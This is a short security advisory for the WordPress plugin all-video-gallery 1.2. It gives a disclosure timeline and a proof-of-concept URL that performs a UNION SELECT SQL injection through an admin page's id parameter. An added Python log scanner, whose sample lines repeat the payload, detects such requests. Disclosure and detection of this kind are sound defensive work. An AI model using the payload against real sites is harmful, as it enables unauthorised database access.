Plugin Details
Plugin Name: wp-plugin : all-video-gallery
Affected Version : 1.2 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
- December 25, 2013 : Vendor Contacted
- May 28, 2014 : Public Disclosure
Technical Details
<http://localhost/wp-admin/admin.php?page=allvideogallery_videos&opt=edit&id=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18>
Although version 1.2 was released to fix similar issues, this particular instance was not fixed, considering the fact that this interface is only accessible to administrators.
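A log check for the request shape shown above, as an added example that is not part of the original advisory or the plugin's code: it flags requests to the `allvideogallery_videos` admin page whose `id` parameter is anything other than a plain number. The function names, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin page named in the advisory; its `id` parameter should be a bare row number.
PAGE = "allvideogallery_videos"

# Request line of a combined-format access log (assumed format). The lazy match
# also copes with targets that were sent with unencoded spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S.*?) HTTP/[\d.]+"')

def suspicious_id(request_target):
    """Return the decoded id value if the request targets the plugin's admin
    page with a non-numeric id, otherwise None."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if PAGE not in query.get("page", []):
        return None
    for value in query.get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(log_lines):
    """Return (line_number, offending_id) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_id(match.group(1))
        if bad is not None:
            hits.append((number, bad))
    return hits

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/May/2014:10:00:01 +0000] "GET /wp-admin/admin.php'
    '?page=allvideogallery_videos&opt=edit&id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [28/May/2014:10:00:09 +0000] "GET /wp-admin/admin.php'
    '?page=allvideogallery_videos&opt=edit&id=2%20union%20select%201,2,user()'
    ' HTTP/1.1" 200 5177',
    '203.0.113.7 - - [28/May/2014:10:00:15 +0000] "GET /wp-admin/admin.php'
    '?page=other_plugin&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric id {bad!r}")
```

Because the check is an allow-list on the expected numeric form rather than a keyword match, it also flags encoded or otherwise obfuscated values in `id`.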